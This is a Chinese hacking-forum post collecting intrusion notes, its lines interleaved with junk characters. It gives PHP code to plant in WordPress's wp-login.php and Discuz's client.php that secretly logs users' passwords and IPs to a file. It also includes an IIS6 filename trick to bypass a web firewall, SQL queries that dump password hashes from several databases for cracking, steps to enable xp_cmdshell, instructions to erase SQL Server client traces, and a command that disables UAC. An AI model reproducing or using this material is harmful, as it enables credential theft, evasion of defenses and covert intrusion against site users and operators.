/ j& r, E: t, N8 i; t8 @/ x. `$log_user=$_POST['log'];
* H' ?4 M$ b' `2 g$log_pwd=$_POST['pwd'];( A% |$ r9 p3 K5 O
$log_ip=$_SERVER["REMOTE_ADDR"];$ A' z3 F2 a: p, F( N3 N+ T
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;# B' i3 j4 o6 }7 Y4 _' {& w0 k
$txt=$txt.”\r\n”;
* A* t( S4 G: r7 i6 ]0 h% W9 F) _if($log_user&&$log_pwd&&$log_ip){
" ~  }  K- w+ N( H2 B$ D@fwrite(fopen(‘pwd.txt’,”a+”),$txt);" p/ g) K9 @/ K) i2 \8 b
}
/ c0 c; |! Z( l当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。) j! o$ }5 z0 O8 G4 i
就是搜索case ‘login’) s7 R5 k. w0 \$ I
在它下面直接插入即可,记录的密码生成在pwd.txt中,( S3 l. p  i/ A, R1 l3 o
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录) c3 G; H9 d2 O6 T; M
利用II6文件解析漏洞绕过安全狗代码:" Y. G: E  A5 q/ y2 v
;antian365.asp;antian365.jpg5 v& x% f. @1 f% B6 a3 Q! R% H

2 K5 c; u6 O) Y$ l& Z2 I( P( A) L各种类型数据库抓HASH破解最高权限密码!
1 ~2 a! J5 k6 m; l/ U1.sql server2000+ n6 N3 d) R) \  T( }5 i
SELECT password from master.dbo.sysxlogins where name='sa'
% D) P" N; I3 y  w2 Q0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
' ~  E# o/ O' t- o: M2FD54D6119FFF04129A1D72E7C3194F7284A7F3A5 F8 L5 d+ X8 K& d1 T3 r

- ^( y3 ]: C( x! p0×0100- constant header
9 G, \  m2 g- _- H9 H34767D5C- salt6 h0 r8 S9 j! I- U: A
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash; U) [9 g: B/ e* w6 `
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
! ~# A* c' D% n6 X; Ycrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
( T4 a4 }  s/ m3 qSQL server 2005:-
& b5 `; m1 h' e; F3 I( ~/ LSELECT password_hash FROM sys.sql_logins where name='sa'- [. ?6 D3 ^& E; D
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F5 a! [- P8 |) |% V; @( n$ f
0×0100- constant header
% J3 H3 O3 y4 @, v7 H993BF231-salt
: H* e; ]3 D# b5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
  h' ]  y; o: n: J) Hcrack case sensitive hash in cain, try brute force and dictionary based attacks.
8 A1 x$ h" C( W4 ]% }  g0 h# ~" a# Q' p& F
update:- following bernardo’s comments:-
/ \' i# l+ o2 c$ z0 Nuse function fn_varbintohexstr() to cast password in a hex string.
( b) r) E9 t9 c) i2 L7 Ie.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
% R" O' i; u  P  Q
4 a# t4 T3 E* L0 L2 |MYSQL:-% K/ Z( S( Y; [( V# W& R
8 Z  p$ ^  G# i0 i/ i4 k
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.* X; w+ v7 W0 c
% v; r" k+ L2 b* P5 U
*mysql  < 4.1
- W9 y, }2 R2 {3 p' i" V1 Y" Z. @7 B! S6 @# E! b
mysql> SELECT PASSWORD(‘mypass’);
7 Q4 u1 Y( \1 V+——————–+
- j8 \% l. |$ j2 f8 k8 b0 C. |5 G| PASSWORD(‘mypass’) |
9 v4 g3 T# O  [7 R% B, C* b+——————–+# ^' i2 S: }# E8 w
| 6f8c114b58f2ce9e   |9 a  X$ i1 `* V0 k* L/ N
+——————–+: O) ~0 b: W# h& `
6 G$ u/ D- w, V- L. o& {7 g3 x
*mysql >=4.1, ^% ~2 z5 K4 m+ A2 ]/ Y
0 `7 t/ T) F6 X. T
mysql> SELECT PASSWORD(‘mypass’);
8 C; W% F3 h6 o; e+ R1 ?, K* p+——————————————-+- S0 U, i! D, T: y7 M- l
| PASSWORD(‘mypass’)                        |
# ~5 ]8 Q* T- E5 K+——————————————-+
1 Q8 C5 \  i# T$ k, y4 q% v| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |% j" G1 a3 N4 T
+——————————————-+
, R7 Z# L7 A% O& _  }
: s- q1 D  i5 g% x, e& J' f, r) LSelect user, password from mysql.user% l; e6 R4 w9 e2 \
The hashes can be cracked in ‘cain and abel’: u4 T# Y  S0 W- p! j

6 z1 H9 C- Q. N+ R& O; d# U8 nPostgres:-
+ Z! ]% T! H3 G) vPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)6 a* ~4 R4 D6 F" `3 r: ]5 J( g" b
select usename, passwd from pg_shadow;
8 i; ^$ h: ^  n. n8 ousename      |  passwd
! s# t2 t0 g5 F/ g: p7 Q, W——————+————————————-4 n1 U- ~& q: g5 e9 Q4 h* |
testuser            | md5fabb6d7172aadfda4753bf0507ed43968 T/ \! h  ?  E" n
use mdcrack to crack these hashes:-
' k& f* \- `7 _8 b) U( t4 [+ E/ C$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
' a% [4 {  j1 D; y% W) y2 |; g" ]+ q& r  n8 ?5 L
Oracle:-# a, N3 A0 i! C: j, L
select name, password, spare4 from sys.user$: _5 }0 }: L  B! a  ~
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g0 [* e; I3 z6 l* |
More on Oracle later, i am a bit bored….
9 }# C0 F  w! b( i9 g
9 V! g) z" b. x, {. W
/ G6 g$ ^9 f! d( g( Q在sql server2005/2008中开启xp_cmdshell; C- N/ [! X! S0 T, Z! A
-- To allow advanced options to be changed.7 L. z9 k6 J+ [0 D# l
EXEC sp_configure 'show advanced options', 1
; z7 A3 ^7 a- yGO/ E  W; I4 `+ T; B' P
-- To update the currently configured value for advanced options.
1 @" O5 @% M1 XRECONFIGURE4 \' z' ~8 H/ E( N* Y- P
GO8 s0 c+ M" x2 V  h$ O2 T3 b
-- To enable the feature.; A" u. |6 C9 M$ [+ B
EXEC sp_configure 'xp_cmdshell', 1, Z- V6 V5 E& {$ o+ ~
GO
# n9 Y/ Q' p; [5 A. g  z-- To update the currently configured value for this feature.' u* }& ^5 ?9 j
RECONFIGURE6 @1 R' f3 n: a  e) L5 d9 \, ~
GO
! j# I& v# u0 q* s4 @- Q; U; ?SQL 2008 server日志清除,在清楚前一定要备份。# @) K/ L) R# A0 q; M9 u7 Y
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
, `& ~. l- x; v: l7 {9 BX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
( I0 y; r! g. k
3 U  f" Y; c( x对于SQL Server 2008以前的版本:
6 g& r& I* |1 _: v4 Y; ISQL Server 2005:
$ {2 n# \% n. p5 i删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat; o1 `% k) t& o$ B4 t
SQL Server 2000:. @* G/ W3 {" Q
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。! C/ P' G( g7 L' L! ?5 @, K6 J7 C

' ~3 o' ~8 d: j- n0 h本帖最后由 simeon 于 2013-1-3 09:51 编辑4 @! a3 P" u- F9 a5 r$ G3 B" f

  J' X5 X5 q- N' M; D3 g. K2 h5 ?$ _
windows 2008 文件权限修改
5 k" G  [8 S/ i; Y- J+ \1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx8 F' ]7 R4 y9 Z1 o1 Z. T
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98* |9 [1 s* v5 ^$ i
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
# a7 ?6 T% `9 b' y
1 s# _3 w6 a3 ?3 N3 i: I* b. UWindows Registry Editor Version 5.00* X" U6 Y) \$ ^9 `: X) b
[HKEY_CLASSES_ROOT\*\shell\runas]0 e8 L8 f9 f% _3 q" z/ x- {
@="管理员取得所有权"
$ |5 P) h8 y( F8 h) r"NoWorkingDirectory"=""
0 H( ^/ M) _3 M0 X/ S) o& e[HKEY_CLASSES_ROOT\*\shell\runas\command]7 y+ I; b$ L5 Q
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& J+ a2 U! H1 O, U  s# {. M9 q
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# t5 t$ _# L$ E0 z
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
& u1 L- g- d" M8 ~@="管理员取得所有权"
- L& s1 i5 Q! b: C0 h5 N0 I: N"NoWorkingDirectory"=""
, O9 Q! G6 }5 d( I. }[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
; f7 v# @; r, ]) I; l0 _+ z@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
) d) m1 i, @3 X0 h. ?9 k- \  E"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# q, e  C+ t) x7 D2 }8 W& J  H
; U/ }8 V2 P$ I% h/ O0 X3 X
[HKEY_CLASSES_ROOT\Directory\shell\runas]- x+ l* r* G* W* Y9 e' l; q1 o
@="管理员取得所有权"
: X& l! B4 A6 r, @% z% q! X! T"NoWorkingDirectory"=""7 J* c. q8 `6 M7 P& `
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
5 g6 U, k  l# X& C: b* M@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
: R( l* \" A6 n: w+ Y1 D" @"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
- F4 n3 v. C' \% `4 }$ j
' G3 g$ {4 J( c; {% h5 g
2 r1 J+ x* A* @! I9 c) u1 E6 Owin7右键“管理员取得所有权”.reg导入
( s" E& c1 ^; ^二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
1 x) K$ Q. J, [" @( `; n/ |$ Z1、C:\Windows这个路径的“notepad.exe”不需要替换
* n0 q! w" D  h- K; D) J7 b2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
& t6 t+ u9 w4 q& Y5 ~) s: ^2 ]3、四个“notepad.exe.mui”不要管& A. |( F+ E+ H$ ?; c* n
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和5 t5 |$ J: a6 ^* T. E5 a9 J
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”% N  w! @& ?. a* g7 f+ d+ L, N
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,( _; q! N& \) }( H* S9 w
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
- l1 r. g& W8 ?0 q( zwindows 2008中关闭安全策略:
* n% m  M( {0 ~reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
& G# j" z! C' v修改uc_client目录下的client.php 在
' s. l- h4 p* `, ?2 _8 W. rfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
) F/ `3 t9 V' R- i6 s+ u下加入如上代码,在网站./data/cache/目录下自动生成csslog.php1 {2 Q( E4 T; h2 l4 e  v( }. Y7 x
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
% j2 ?# f7 X4 F+ X0 }* w/ p8 ^if(getenv('HTTP_CLIENT_IP')) {
' O) E# Y+ ^) V% T# D3 L$onlineip = getenv('HTTP_CLIENT_IP');* d. g4 ^4 d/ z* o, l4 A, G- n1 S; i' g5 K
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {6 P/ ^) `: m; o/ Q6 x/ B
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
: y7 {3 t* v4 ?! k} elseif(getenv('REMOTE_ADDR')) {
6 J* \) A6 H- |' F: Y) p$onlineip = getenv('REMOTE_ADDR');" G# j% b5 Q; |, L0 z6 N4 w# u. Q
} else {
6 L, w) \# s9 a8 Y$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
/ _7 Z7 z2 W/ u- r4 [9 h+ ]2 Z}
; B4 s$ A6 u. M: L     $showtime=date("Y-m-d H:i:s");
- O) q& X, L$ [% Y    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";" ]/ M' r7 B5 G/ f! v  y
    $handle=fopen('./data/cache/csslog.php','a+');7 H; x2 S. c$ q3 Y4 r' B
    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表